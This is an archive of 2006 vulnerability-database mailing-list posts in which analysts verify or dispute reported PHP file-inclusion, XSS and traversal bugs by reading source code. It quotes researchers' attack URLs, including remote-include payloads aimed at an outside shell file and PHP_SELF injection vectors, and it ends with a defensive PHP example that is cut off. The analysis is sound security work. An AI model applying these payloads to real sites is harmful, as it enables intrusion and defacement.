Christey) Date: Tue, 10 Oct 2006 14:17:53 -0400 (EDT) Subject: [VIM] CVE-2006-5158 (NFS lockd in Linux) - more than SUSE Message-ID: <200610101817.k9AIHrqf023647@faron.mitre.org> FYI, this was originally thought to be SUSE-specific based on CVE's interpretation of SUSE'S advisory text, but we were just notified that this affects the kernel itself, so other distros may be affected as well. This was not originally presented as an attacker-controllable DoS, which is why the original post/patch dates are so old. The current CVE desc tries to resolve why SuSE said "deadlock" from the "oops" in the patch, but it's a bit of a guess. - Steve ====================================================== Name: CVE-2006-5158 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5158 Reference: MLIST:[linux-kernel] 20051216 lockd: couldn't create RPC handle for (host) Reference: URL:http://marc.theaimsgroup.com/?l=linux-kernel&m=113476665626446&w=2 Reference: MLIST:[linux-kernel] 20051218 Re: lockd: couldn't create RPC handle for (host) Reference: URL:http://marc.theaimsgroup.com/?l=linux-kernel&m=113494474208973&w=2 Reference: CONFIRM:http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=9b5b1f5bf9dcdb6f23abf65977a675eb4deba3c0 Reference: SUSE:SUSE-SA:2006:057 Reference: URL:http://www.novell.com/linux/security/advisories/2006_57_kernel.html The nlmclnt_mark_reclaim in clntlock.c in NFS lockd in Linux kernel before 2.6.16 allows remote attackers to cause a denial of service (process crash) and deny access to NFS exports via unspecified vectors that trigger a kernel oops (null dereference) and a deadlock. From coley at mitre.org Tue Oct 10 18:56:09 2006 From: coley at mitre.org (Steven M. 
Christey) Date: Tue, 10 Oct 2006 18:56:09 -0400 (EDT) Subject: [VIM] phpWebSite 0.10.2 RFI - CVE dispute Message-ID: <200610102256.k9AMu9tk028838@faron.mitre.org> Researcher: Crackers_Child (which is why I looked closer) Reference: phpWebSite 0.10.2 Remote File Include Vulnerabilities http://www.securityfocus.com/archive/1/archive/1/448098/100/0/threaded I downloaded the same software version, as specified in the URL provided by Crackers_Child, and took a look. Example exploits: > mod/users/init.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt? If we look at init.php, we see: require(PHPWS_SOURCE_DIR."mod/users/class/Cookie.php"); require(PHPWS_SOURCE_DIR."mod/users/class/ModSetting.php"); require(PHPWS_SOURCE_DIR."mod/users/class/Forms.php"); require(PHPWS_SOURCE_DIR."mod/users/class/Groups.php"); and nothing else. So, we have a PHP constant. Can't be controlled, right? > mod/users/class/users.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt? Actually it's spelled "Users.php" Anyway, we have things like this: require_once(PHPWS_SOURCE_DIR . 'core/Error.php'); for users/class/Cookie.php: require_once(PHPWS_SOURCE_DIR.'core/Form.php'); going to core/EZform.php: require_once PHPWS_SOURCE_DIR . "core/EZelement.php"; A grep for PHPWS_SOURCE_DIR returns 799 matches, almost all of which are of the forms above, and one or two define's of the constant. There is no evidence of any use of $_GET, $PHPWS_SOURCE_DIR, etc. - Steve From smoore at securityglobal.net Tue Oct 10 23:44:06 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Tue, 10 Oct 2006 23:44:06 -0400 Subject: [VIM] Advanced Poll v2.02 :) <= Remote File Inclusion Message-ID: <452C6886.4060009@securityglobal.net> Apparently a repeat of CVE-2003-1178. 
> From: alguidy at hotmail.com > Subject: Advanced Poll v2.02 :) <= Remote File Inclusion > Date: 8 Oct 2006 14:30:29 -0000 From smoore at securityglobal.net Tue Oct 10 23:48:25 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Tue, 10 Oct 2006 23:48:25 -0400 Subject: [VIM] The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit Message-ID: <452C6989.9040100@securityglobal.net> At least in "index.php" there is this (preventing user specification of isearch_path): > $isearch_path = dirname(__FILE__); Didn't check the others. Stuart > From: xp1o at msn.com > Subject: The latest version of iSearch is V2.16 <= (index.php) > Remote File Inclusion Exploit > Date: 7 Oct 2006 22:14:00 -0000 From smoore at securityglobal.net Tue Oct 10 23:49:53 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Tue, 10 Oct 2006 23:49:53 -0400 Subject: [VIM] The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit In-Reply-To: <452C6989.9040100@securityglobal.net> References: <452C6989.9040100@securityglobal.net> Message-ID: <452C69E1.6030609@securityglobal.net> Sorry, I didn't see that str0ke posted this same info to bugtraq already. Stuart Stuart Moore wrote: > At least in "index.php" there is this (preventing user specification of > isearch_path): > > > $isearch_path = dirname(__FILE__); > > Didn't check the others. > > Stuart > > > > > > > From: xp1o at msn.com > > Subject: The latest version of iSearch is V2.16 <= (index.php) > > Remote File Inclusion Exploit > > Date: 7 Oct 2006 22:14:00 -0000 > > From coley at mitre.org Wed Oct 11 18:07:30 2006 From: coley at mitre.org (Steven M. 
Christey) Date: Wed, 11 Oct 2006 18:07:30 -0400 (EDT) Subject: [VIM] Source VERIFY of tagit2b delTagUser.php RFI Message-ID: <200610112207.k9BM7Ubc022340@faron.mitre.org> Researcher: k1tk4t at newhack.org Post: BUGTRAQ:20061010 tagit2b -- Remote File Inclusion http://www.securityfocus.com/archive/1/archive/1/448173/100/0/threaded I downloaded the source as specified by the researcher. Relevant code from the top of delTagUser.php (some whitespace removed): Researcher: CvIr.System Reference: BUGTRAQ:20061013 CMS contenido Remote File Inclusion http://www.securityfocus.com/archive/1/archive/1/448549/100/0/threaded I was investigating whether this was a rediscovery of CVE-2005-4132, but CVE-2005-4132 comes from a vague vendor disclosure that doesn't have any vector information. So after a couple minutes' investigation, I wasn't sure if this was really new or not. Downloading the code from: http://www.contenido.org/opensourcecms/en/index-a-104.html I got Stable Version 4.6.15. It looks like config.php sets $contenido_path to a static value: $contenido_path = "../contenido/"; and config.php is included before the claimed-vulnerable code: from cms/dbfs.php: include_once ("config.php"); include_once ($contenido_path . "includes/startup.php"); from cms/front_content.php: include_once ("config.php"); # Contenido startup process include_once ($contenido_path."includes/startup.php"); No other code in the cms/ directory has an include that uses $contenido_path. So, this looks like an incorrect report. - Steve From coley at mitre.org Tue Oct 17 22:13:15 2006 From: coley at mitre.org (Steven M. 
Christey) Date: Tue, 17 Oct 2006 22:13:15 -0400 (EDT) Subject: [VIM] SecureWorks Research Client Advisory: Multiple Vendor Bluetooth Memory Stack Corruption Vulnerability Message-ID: <200610180213.k9I2DFoo024483@faron.mitre.org> ** working notes - been a long day and if someone wants to follow through, I'd appreciate it ** The SecureWorks advisory speaks of a "flaw" and "memory stack corruption" but do not refer to this as a buffer overflow. The affected driver versions go up to 4.00.35. They include this as a cross-reference: Buffer Overrun in Toshiba Bluetooth Stack for Windows http://trifinite.org/trifinite_advisory_toshiba.html This document, published in June, only specifies versions up to 4.0.23, and it specifically states that there is a buffer overflow, and it even lists the attack vectors involving L2CAP Echo Requests. So - is there one bug or 2? The Toshiba URL they refer to includes a "PC Bluetooth Stack Security Patch 2" whose Details document says "Fix L2CAP echo issue" (it also mentions OBEX directory traversal but that is outside this particular discussion). There's also a "PC Bluetooth Stack" section whose Details document says "Security fix", but the phrase "Bluetooth Stack 4.00.36(T)" seems to imply that 4.00.36 is also affected, which is inconsistent with the SecureWorks advisory. Thoughts? 
- Steve From jericho at attrition.org Wed Oct 18 01:24:15 2006 From: jericho at attrition.org (security curmudgeon) Date: Wed, 18 Oct 2006 01:24:15 -0400 (EDT) Subject: [VIM] 28547: Web Dictate Null Password Authentication Bypass (fwd) Message-ID: ---------- Forwarded message ---------- From: Peter Lupton NCH Swift Sound To: moderators at osvdb.org Date: Wed, 18 Oct 2006 15:22:30 +1000 Reply-To: moderators at osvdb.org Subject: [OSVDB Mods] [Change Request] 28547: Web Dictate Null Password Authentication Bypass Can you please note a remedy on: http://www.osvdb.org/28547 That is to download the release version from: http://www.nch.com.au/webdictate/index.html The security issue noted on your site only applied to the beta version of 1.02. Release versions and later versions do not have this issue. Peter Lupton NCH Swift Sound Unit 13, Level 3 28 University Avenue GPO Box 1169 Canberra ACT 2601 Australia www.nch.com.au From smoore at securityglobal.net Wed Oct 18 22:58:45 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Wed, 18 Oct 2006 22:58:45 -0400 Subject: [VIM] CVE-2006-5402, fishy? Message-ID: <4536E9E5.8040707@securityglobal.net> Based on a not-quite-complete analysis, this one looks suspicious: I can't find a copy of version 2.1. However, in looking at newer versions (2.1.29 and 3.0.1) and in looking at old code from CVS, it appears that $include_path is specified. In version 2.1.29, the 'index.php' script (v 1.10 2005/09/19 13:42:00) says: include_once ("./includes/config.inc.php"); And the 'config.inc.php' script (v 1.50.2.24 2006/09/30 11:01:16) says: $class_path = 'classes'; // classes So that should prevent any attack via 'class_path' in 2.1.29. 
And checking the earlier code from the now defunct CVS repository on sourceforge (circa release 1.0 time frame): index.php,v 1.29 2004/01/13 06:39:29: 10 include ("./includes/error_report.inc.php") ; 11 include ("./includes/global_vars.inc.php") ; 12 include ("./includes/config.inc.php"); cart.php,v 1.21 2004/04/06 08:11:03: 10 $base_path="."; 11 $base_auth = ""; 12 $base_title = "\$msg[396]"; 13 require_once ("$base_path/includes/init.inc.php"); 14 15 // modules propres ? cart.php ou ? ses sous-modules 16 include("$include_path/cart.inc.php"); init.inc.php,v 1.14 2004/03/02 09:12:56: 35 include ("$base_path/includes/error_report.inc.php") ; 36 include ("$base_path/includes/global_vars.inc.php") ; 37 require("$base_path/includes/config.inc.php"); 38 39 // prevents direct script access 40 if(preg_match('/init\.inc\.php/', $REQUEST_URI)) { 41 include('forbidden.inc.php'); forbidden(); 42 } 43 44 $include_path = $base_path."/".$include_path; 45 $class_path = $base_path."/".$class_path; config.inc.php,v 1.28 2003/12/22 13:52:12: 134 $include_path = 'includes'; // includes 135 $class_path = 'classes'; // classes So, that should prevent attacks via include_path or class_path. I've written to the vendor for confirmation. Stuart From smoore at securityglobal.net Thu Oct 19 07:10:27 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Thu, 19 Oct 2006 07:10:27 -0400 Subject: [VIM] CVE-2006-5402, fishy? In-Reply-To: <4536E9E5.8040707@securityglobal.net> References: <4536E9E5.8040707@securityglobal.net> Message-ID: <45375D23.1020107@securityglobal.net> Well, the vendor says that version 3.01 is indeed vulnerable. There is a patch at: http://www.sigb.net/patch.php Stuart Stuart Moore wrote: > Based on a not-quite-complete analysis, this one looks suspicious: > > I can't find a copy of version 2.1. However, in looking at newer > versions (2.1.29 and 3.0.1) and in looking at old code from CVS, it > appears that $include_path is specified. 
> > In version 2.1.29, the 'index.php' script (v 1.10 2005/09/19 13:42:00) > says: > > include_once ("./includes/config.inc.php"); > > And the 'config.inc.php' script (v 1.50.2.24 2006/09/30 11:01:16) says: > > $class_path = 'classes'; // classes > > So that should prevent any attack via 'class_path' in 2.1.29. > > And checking the earlier code from the now defunct CVS repository on > sourceforge (circa release 1.0 time frame): > > index.php,v 1.29 2004/01/13 06:39:29: > > 10 include ("./includes/error_report.inc.php") ; > 11 include ("./includes/global_vars.inc.php") ; > 12 include ("./includes/config.inc.php"); > > cart.php,v 1.21 2004/04/06 08:11:03: > > 10 $base_path="."; > 11 $base_auth = ""; > 12 $base_title = "\$msg[396]"; > 13 require_once ("$base_path/includes/init.inc.php"); > 14 > 15 // modules propres ? cart.php ou ? ses sous-modules > 16 include("$include_path/cart.inc.php"); > > init.inc.php,v 1.14 2004/03/02 09:12:56: > > 35 include ("$base_path/includes/error_report.inc.php") ; > 36 include ("$base_path/includes/global_vars.inc.php") ; > 37 require("$base_path/includes/config.inc.php"); > 38 > 39 // prevents direct script access > 40 if(preg_match('/init\.inc\.php/', $REQUEST_URI)) { > 41 include('forbidden.inc.php'); forbidden(); > 42 } > 43 > 44 $include_path = $base_path."/".$include_path; > 45 $class_path = $base_path."/".$class_path; > > config.inc.php,v 1.28 2003/12/22 13:52:12: > > 134 $include_path = 'includes'; // includes > 135 $class_path = 'classes'; // classes > > So, that should prevent attacks via include_path or class_path. > > I've written to the vendor for confirmation. > > Stuart > > From coley at mitre.org Fri Oct 20 19:32:43 2006 From: coley at mitre.org (Steven M. Christey) Date: Fri, 20 Oct 2006 19:32:43 -0400 (EDT) Subject: [VIM] vendor ACK for old YPOPs! 
issue Message-ID: <200610202332.k9KNWhmS005148@faron.mitre.org> Reference: CVE-2004-1558 ACK: http://dbeusee.home.comcast.net/history.html (this is only intended to be within a frame; home site is http://dbeusee.home.comcast.net) The vendor changelog "Version 0.6.1216 (16th December 2004) BETA" says "Fixed the security issues raised in the following advisory" and references BID:11256 and the hat-squad MISC. - Steve ====================================================== Name: CVE-2004-1558 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1558 Reference: BUGTRAQ:20040927 [Hat-Squad] Remote Buffer overflow Vulnerability in YahooPOPS Reference: URL:http://marc.theaimsgroup.com/?l=bugtraq&m=109630699829536&w=2 Reference: MISC:http://www.hat-squad.com/en/000075.html Reference: BID:11256 Reference: URL:http://www.securityfocus.com/bid/11256 Reference: SECTRACK:1011426 Reference: URL:http://securitytracker.com/alerts/2004/Sep/1011426.html Reference: XF:ypops-pop3-bo(17515) Reference: URL:http://xforce.iss.net/xforce/xfdb/17515 Reference: XF:ypops-smtp-bo(17518) Reference: URL:http://xforce.iss.net/xforce/xfdb/17518 Multiple stack-based buffer overflows in YahooPOPS (YPOPs) 0.4 through 0.6 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) POP3 USER command or (2) SMTP request. 
From heinbockel at mitre.org Mon Oct 23 09:43:26 2006 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Mon, 23 Oct 2006 09:43:26 -0400 Subject: [VIM] PHP file inclusions in PHP Developer Library 1.5.3 (some disputed) Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC0146D456@IMCSRV5.MITRE.ORG> In the past 2 weeks there have been 3 separate issues involving the Softerra PHP Developer Library 1.5.3: (1) http://www.milw0rm.com/exploits/2511 (2) http://www.milw0rm.com/exploits/2520 (3) BUGTRAQ:20061020 PHPLibrary-1.5.3(Description.php) Remote File Include http://www.securityfocus.com/archive/1/archive/1/449355/100/0/threaded Upon brief source code inspection, the first two appear to be legitimate. DISPUTED The third issue, appears to be a lack of research on the part of the reporter (due to grep or Google Code Search). The distribution as of 20061023 does not contain a file called Description.php. It does, however, contain a Description file (no file extension) which does contain the reported line (line 253): > include ($lib_dir . "sqlstorage.class.php"); However there is no clear way to get this file to be handled by the PHP interpreter (mod_php or similar). William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From coley at mitre.org Mon Oct 23 15:57:40 2006 From: coley at mitre.org (Steven M. 
Christey) Date: Mon, 23 Oct 2006 15:57:40 -0400 (EDT) Subject: [VIM] Source VERIFY - speedberg RFI Message-ID: <200610231957.k9NJvelx025032@faron.mitre.org> Researcher: k1tk4t Issue: speedberg 1.2beta1 RFI http://www.securityfocus.com/archive/1/archive/1/449468/100/0/threaded k1tk4t lists the following vulnerable files: entrancePage.tpl.php generalToolBox.tlb.php myToolBox.tlb.php scriplet.inc.php simplePage.tpl.php speedberg.class.php standardPage.tpl.php Source code inspection of the 1.2beta1 package (URL referenced in the original advisory) shows that all the aforementioned files have the following code in the first line: require_once($SPEEDBERG_PATH."include/speedberg.class.php"); speedberg.class.php itself has: require_once($SPEEDBERG_PATH."config/general.inc.php"); require_once($SPEEDBERG_PATH."include/settings.inc.php"); require_once($SPEEDBERG_PATH."include/sitemap.class.php"); - Steve From coley at linus.mitre.org Mon Oct 23 18:04:09 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 23 Oct 2006 18:04:09 -0400 (EDT) Subject: [VIM] SecureWorks Research Client Advisory: Multiple Vendor Bluetooth Memory Stack Corruption Vulnerability In-Reply-To: <200610180213.k9I2DFoo024483@faron.mitre.org> References: <200610180213.k9I2DFoo024483@faron.mitre.org> Message-ID: I've done a little bit more investigation but still don't have 100% proof of acknowledgement for the latest report. > The SecureWorks advisory speaks of a "flaw" and "memory stack > corruption" but do not refer to this as a buffer overflow. The > affected driver versions go up to 4.00.35. > > They include this as a cross-reference: > > Buffer Overrun in Toshiba Bluetooth Stack for Windows > http://trifinite.org/trifinite_advisory_toshiba.html > > This document, published in June, only specifies versions up to > 4.0.23, and it specifically states that there is a buffer overflow, > and it even lists the attack vectors involving L2CAP Echo Requests. > > So - is there one bug or 2? 
> > The Toshiba URL they refer to includes a "PC Bluetooth Stack Security > Patch 2" whose Details document says "Fix L2CAP echo issue" (it also > mentions OBEX directory traversal but that is outside this particular > discussion). I decided to regard this as sufficient proof of vendor acknowledgement for the June trifinite issue (CVE-2006-3146) since the L2CAP lines up and the original researchers imply that they contacted Toshiba before disclosure. The OBEX directory traversal issue is probably KF's report (CVE-2006-0212). > There's also a "PC Bluetooth Stack" section whose Details document > says "Security fix", but the phrase "Bluetooth Stack 4.00.36(T)" seems > to imply that 4.00.36 is also affected, which is inconsistent with the > SecureWorks advisory. This inconsistency has not been resolved, although at this point it seems like they're reporting a different issue than the L2CAP problem, so I'm treating it differently (CVE-2006-5405). - Steve From coley at linus.mitre.org Tue Oct 24 14:09:11 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 24 Oct 2006 14:09:11 -0400 (EDT) Subject: [VIM] Vendor ACK for LearnCenter XSS (CVE-2006-4540) Message-ID: Received in CVE email. No Jericho, he didn't include version information. I'll follow up and double-check to ensure it's distributable and not just site-specific. - Steve =================================================== Date: Mon, 23 Oct 2006 12:04:43 -0400 From: Andy Wiener To: cve at mitre.org Subject: Vulnerability patched Learn.com has installed a patch to fix the vulnerability that your website posted. I would appreciate it if you could have someone retest it, and update the announcement on your site. The link to the announcement is: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4540 Regards, Andy Wiener Director of Hosting Operations From coley at linus.mitre.org Tue Oct 24 14:38:16 2006 From: coley at linus.mitre.org (Steven M. 
Christey) Date: Tue, 24 Oct 2006 14:38:16 -0400 (EDT) Subject: [VIM] PHP file inclusions in PHP Developer Library 1.5.3 (some disputed) In-Reply-To: <224FBC6B814DBD4E9B9E293BE33A10DC0146D456@IMCSRV5.MITRE.ORG> References: <224FBC6B814DBD4E9B9E293BE33A10DC0146D456@IMCSRV5.MITRE.ORG> Message-ID:

On Mon, 23 Oct 2006, Heinbockel, Bill wrote:

> The distribution as of 20061023 does not contain a file called
> Description.php. It does, however, contain a Description file
> (no file extension) which does contain the reported line (line 253):
>
> include ($lib_dir . "sqlstorage.class.php");
>
> However there is no clear way to get this file to be handled by the
> PHP interpreter (mod_php or similar).

I took a closer look at this since it was so weird. The "Description" file is basically a bunch of documentation for various functions within the library. It is free-form text and there are no "" specifiers (or "
JaxUltraBB <= 2.0 (delete.php) Defaced Exploit
http://www.milw0rm.com/exploits/2616
XF:jaxultrabb-delete-file-include(29711)
BID:20679

In the delete.php file in JUBB 2.0 (lines 22-38):

  $forum = $_GET['forum'];
  $topicsfile = file_get_contents("topics/$forum"."topics.JaxSQL");
  $topics = explode("{TOPIC}", $topicsfile);
  foreach ($topics as $topic) {
    if ($topic != "") {
      if ($topic == $topicpulled) { // topic is the desired one to delete
        //just sit here...
      } else {
        $contents = $contents . "{TOPIC}" . $topic;
      }
    }
  }
  $openfile = fopen("topics/".$forum."topics.JaxSQL", "w");
  fwrite($openfile, $contents);
  fclose($openfile);

$contents is not defined before being used on line 31, when building up a concatenation of lines from the $forum file to "delete" the to-be-deleted topic.

In the exploit:

  delete.php?modtype=%3Cimg%20src=img/admin.jpg%3E&forum=../index.php%00& contents=[XSS]

The modtype passed an "attempting hacking" check, while the forum specifies the "topics" file (this is vulnerable to directory traversal, but only file modification can occur in conjunction with the code injection).

End result: whatever the value of the $contents variable is initially is prepended to the $forum file.

William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615

From heinbockel at mitre.org Wed Oct 25 10:47:47 2006 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Wed, 25 Oct 2006 10:47:47 -0400 Subject: [VIM] CONFIRM: OTSCMS file inclusions - PHP5 __autoload Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC0146D8E7@IMCSRV5.MITRE.ORG>

http://www.milw0rm.com/exploits/2622

OTSCMS is written for PHP 5. The vulnerable code for each of the 3 exploits resembles the following (from 1.4.0):

  // function for automatic loading class
  function __autoload($class)
  {
    require_once($GLOBALS['config']['otscms']['directories']['classes'] . $class . '.php');
  }

In PHP5, the __autoload function is used to signal the PHP interpreter how to load an unrecognized PHP object. So, if there is any class used later that is not in an already included file, the __autoload function will be automatically called.

So on line 38, there is:

  // initializes SQL database connection
  $sql = new SQL($config['sql']['host'], $config['sql']['user'], $config['sql']['password'], $config['sql']['database'], $config['sql']['prefix']);

Therefore, __autoload will be called when the interpreter reaches this line.

William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615

From coley at mitre.org Thu Oct 26 12:17:39 2006 From: coley at mitre.org (Steven M.
Christey) Date: Thu, 26 Oct 2006 12:17:39 -0400 (EDT) Subject: [VIM] Source VERIFY: PHP Generator of Object SQL Database RFI Message-ID: <200610261617.k9QGHd9j023317@faron.mitre.org>

Researcher: xorontr gmail com
Post: PHP Generator of Object SQL Database (path) Remote File Include Vulnerability
http://www.securityfocus.com/archive/1/archive/1/449475/100/0/threaded

function.php3 begins with this code:

MISC:http://www.milw0rm.com/exploits/2596

Researcher says "langage" parameter, but apparently some vuln DBs say "language". Source inspection by a senior CVE analyst showed that it is "langage" and there is no "language".

- Steve

From coley at mitre.org Tue Oct 31 15:53:26 2006 From: coley at mitre.org (Steven M. Christey) Date: Tue, 31 Oct 2006 15:53:26 -0500 (EST) Subject: [VIM] Ig-shop change_pass.php XSS - 2 vectors Message-ID: <200610312053.k9VKrQ8C006058@faron.mitre.org>

There's a slightly confusing discrepancy in SECTRACK:1017130 and BID:20768, in which the description mentions the "id" parameter. However, the raw source, included verbatim in the SECTRACK, provides an exploit using the action parameter.

I dug up the source code and figured out that both vectors are valid.

In version 1.4 from sourceforge, dated 2003, change_pass.php has:

>

So, that's the "id" vector.

And, for $action we have:

  if($action=="1")
  {
    ...
  }
  else
  {
  ?>

So, as long as action is not "1", the query string is dumped into the form. This takes care of the action parameter, in the sense that it's not "1" and is part of the query string.

I don't know what the original researcher's intention was with listing the Validate() function. It doesn't seem to contain any of that DOM-based XSS stuff, and it's only activated when the user presses Submit.

There might be some other issues elsewhere in the code, such as where action is 1, but I didn't investigate further.

- Steve

From coley at mitre.org Tue Oct 31 17:16:24 2006 From: coley at mitre.org (Steven M. Christey) Date: Tue, 31 Oct 2006 17:16:24 -0500 (EST) Subject: [VIM] Likely vendor fix for Faq Administrator 2.1b Message-ID: <200610312216.k9VMGOG2007661@faron.mitre.org>

Reference: MISC:http://www.milw0rm.com/exploits/2678

Faq Administrator 3.0 was apparently released today, at the same URL as mentioned in the milw0rm page. Many files are dated Oct 31. The "update.txt" file says:

  This is a security patch release!
  ...
  A bug has been found that may allow code to be ran on your system.
  ...
  1) DELETE:
     c2.php
     c3.php
     blank.php
     faqsend.php
     faq_reply.php
     hist_replycount.php
     mail.php
     reply_count.php
     total_asked.php

Using the powerful technique of URL guessing, I was able to download the older 2.1b version. faq_reply.php has this code:

  include ("$email");

grep showed that this was the only place where a variable was used in an include, require, or open statement.

Given the date and the solution, I think this will be treated as sufficient acknowledgement by CVE.

But, now there's a question of the other files that got deleted. Based on *casual* inspection, it appears that the other files were merged into two patch files. These deleted files only contained 6 to 30 lines each. It's not clear whether this combination was defensive or not, although there did seem to be some possibility of variable modification, although some files such as blank.php didn't have any code at all.
I didn't look too closely.

- Steve

From smoore at securityglobal.net Tue Oct 31 17:26:28 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Tue, 31 Oct 2006 17:26:28 -0500 Subject: [VIM] Ig-shop change_pass.php XSS - 2 vectors In-Reply-To: <200610312053.k9VKrQ8C006058@faron.mitre.org> References: <200610312053.k9VKrQ8C006058@faron.mitre.org> Message-ID: <4547CD94.8010207@securityglobal.net>

Steve,

When we initially fired up the code, the 'action' parameter vector didn't work as advertised but code inspection led us to the 'id' parameter vector (I sort of "assumed" that is what the reporter meant to report).

The $PHP_SELF variable returns the script name, but not the query parameters (manual says: "The filename of the currently executing script, relative to the document root"). So the 'action' parameter shouldn't be a valid exploit vector.

But, it looks like you may be able to exploit via the 'email' parameter when used in a POST request because of this line:

  echo "
  The password has been successfully changed!
  Back to User Details
"; I didn't test that part, however. Stuart Steven M. Christey wrote: > There's a slightly confusing discrepancy in SECTRACK:1017130 and > BID:20768, in which the description mentions the "id" parameter. > However, the raw source, included verbatim in the SECTRACK, provides > an exploit using the action parameter. > > I dug up the source code and figured out that both vectors are valid. > > In version 1.4 from sourceforge, dated 2003, change_pass.php has: > >> > > So, that's the "id" vector. > > And, for $action we have: > > if($action=="1") > { > ... > } > else > { > ?> > > > > So, as long as action is not "1", the query string is dumped into the > form. This takes care of the action parameter, in the sense > that it's not "1" and is part of the query string. > > I don't know what the original researcher's intention was with listing > the Validate() function. It doesn't seem to contain any of that > DOM-based XSS stuff, and it's only activated when the user presses > Submit. > > There might be some other issues elsewhere in the code, such as where > action is 1, but I didn't investigate further. > > - Steve > From coley at linus.mitre.org Tue Oct 31 17:59:38 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 31 Oct 2006 17:59:38 -0500 (EST) Subject: [VIM] Ig-shop change_pass.php XSS - 2 vectors In-Reply-To: <4547CD94.8010207@securityglobal.net> References: <200610312053.k9VKrQ8C006058@faron.mitre.org> <4547CD94.8010207@securityglobal.net> Message-ID: Stuart, For a second I thought I'd had a huge misunderstanding about PHP_SELF, then things became OK. I guess there's a particular subtlety that hasn't reached widespread awareness. > The $PHP_SELF variable returns the script name, but not the query > parameters (manual says: "The filename of the currently executing > script, relative to the document root"). So the 'action' parameter > shouldn't be a valid exploit vector. 
The population of PHP_SELF seems to get confused sometimes, or at least returns unexpected values. This might be related to how Apache parses PHP requests, I don't know. Take an example abc.php (tested on PHP 4.3 on Apache): echo $_SERVER['PHP_SELF']; Calling this: http://url/abc.php/param= gives the XSS dialog we all know and love. Looks like the request is parsed into "before ?" and "after ?", and anything before "?" is dumped into PHP_SELF. So, for ig-shop, what happens if you use something like: http://site.com/ig-shop/change_pass.php/action=">[etc. etc. etc] i.e., a "/" between change_pass.php and action? - Steve From smoore at securityglobal.net Tue Oct 31 20:15:21 2006 From: smoore at securityglobal.net (Stuart Moore) Date: Tue, 31 Oct 2006 20:15:21 -0500 Subject: [VIM] Ig-shop change_pass.php XSS - 2 vectors In-Reply-To: References: <200610312053.k9VKrQ8C006058@faron.mitre.org> <4547CD94.8010207@securityglobal.net> Message-ID: <4547F528.4020300@securityglobal.net> Steve, You are right, this works: change_pass.php/action=">[etc. etc. etc] It is possible that the following could work on some Apache configs (especially if mod_rewrite is rewriting the URL): change_pass.php?action=">[etc. etc. etc] Either way, the functioning of $PHP_SELF does not seem consistent w/ the PHP documentation. I noticed that the variable has a long history of bugs and documentation inconsistencies ... Stuart Steven M. Christey wrote: > Stuart, > > For a second I thought I'd had a huge misunderstanding about PHP_SELF, > then things became OK. I guess there's a particular subtlety that hasn't > reached widespread awareness. > >> The $PHP_SELF variable returns the script name, but not the query >> parameters (manual says: "The filename of the currently executing >> script, relative to the document root"). So the 'action' parameter >> shouldn't be a valid exploit vector. > > The population of PHP_SELF seems to get confused sometimes, or at least > returns unexpected values. 
This might be related to how Apache parses PHP > requests, I don't know. > > Take an example abc.php (tested on PHP 4.3 on Apache): > > echo $_SERVER['PHP_SELF']; > > Calling this: > > http://url/abc.php/param= > > gives the XSS dialog we all know and love. > > Looks like the request is parsed into "before ?" and "after ?", and > anything before "?" is dumped into PHP_SELF. > > So, for ig-shop, what happens if you use something like: > > http://site.com/ig-shop/change_pass.php/action=">[etc. etc. etc] > > i.e., a "/" between change_pass.php and action? > > - Steve >
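An added illustration, written for this archive and not taken from ig-shop or from either poster, of the subtlety the thread settles on: under Apache, PHP_SELF is SCRIPT_NAME plus PATH_INFO, so the path segment after change_pass.php lands verbatim in any attribute it is echoed into. The $_SERVER array below is constructed to mimic that request shape; the function names are hypothetical.

```php
<?php
// Added example (not ig-shop code). Shows why echoing $_SERVER['PHP_SELF']
// unescaped into a form action is an XSS sink, and two ways to render the
// action safely. The $_SERVER values are constructed to mimic a request of the
// form /ig-shop/change_pass.php/<path-info>, where everything before "?" but
// after the script name is PATH_INFO and is appended to PHP_SELF.

// Vulnerable pattern: PHP_SELF carries attacker-controlled PATH_INFO, and the
// double quote in it closes the attribute early.
function form_action_unsafe(array $server): string
{
    return '<form action="' . $server['PHP_SELF'] . '">';
}

// Hardened pattern 1: encode for the HTML attribute context. ENT_QUOTES makes
// both " and ' inert, so the attribute cannot be broken out of.
function form_action_escaped(array $server): string
{
    $self = htmlspecialchars($server['PHP_SELF'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $self . '">';
}

// Hardened pattern 2: use SCRIPT_NAME, which is the script path without
// PATH_INFO, and still encode it (defence in depth against odd SAPI values).
function form_action_script_name(array $server): string
{
    $name = htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $name . '">';
}

// Constructed request: /ig-shop/change_pass.php/action="><marker>
// (a harmless marker stands in for the "[etc. etc. etc]" in the thread).
$server = [
    'SCRIPT_NAME' => '/ig-shop/change_pass.php',
    'PATH_INFO'   => '/action="><marker>',
    'PHP_SELF'    => '/ig-shop/change_pass.php/action="><marker>',
];

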